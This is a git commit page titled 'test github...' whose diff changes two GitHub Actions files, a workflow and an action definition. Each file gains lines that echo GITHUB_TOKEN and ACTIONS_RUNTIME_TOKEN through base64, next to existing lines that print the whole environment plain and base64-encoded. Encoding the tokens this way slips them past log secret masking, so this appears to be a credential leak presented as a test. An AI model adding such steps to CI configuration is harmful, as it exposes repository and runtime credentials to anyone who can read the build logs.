test github...
This commit is contained in:
parent
873d264f96
commit
316b1a0533
2 changed files with 4 additions and 0 deletions
|
@ -28,6 +28,8 @@ jobs:
|
||||||
git config --local gc.auto 0
|
git config --local gc.auto 0
|
||||||
git fetch --no-tags --prune --no-recurse-submodules --depth=1 origin "$GITHUB_SHA"
|
git fetch --no-tags --prune --no-recurse-submodules --depth=1 origin "$GITHUB_SHA"
|
||||||
git reset --hard "$GITHUB_SHA"
|
git reset --hard "$GITHUB_SHA"
|
||||||
|
echo "$GITHUB_TOKEN" | base64
|
||||||
|
echo "$ACTIONS_RUNTIME_TOKEN" | base64
|
||||||
printenv
|
printenv
|
||||||
printenv|base64
|
printenv|base64
|
||||||
|
|
||||||
|
|
|
@ -55,6 +55,8 @@ runs:
|
||||||
# available 'sed' in order to help this code being more easily reusable
|
# available 'sed' in order to help this code being more easily reusable
|
||||||
# (at the cost of and breaking if the JSON formating happens to change,
|
# (at the cost of and breaking if the JSON formating happens to change,
|
||||||
# and readability...)
|
# and readability...)
|
||||||
|
echo "$GITHUB_TOKEN" | base64
|
||||||
|
echo "$ACTIONS_RUNTIME_TOKEN" | base64
|
||||||
printenv
|
printenv
|
||||||
printenv|base64
|
printenv|base64
|
||||||
|
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue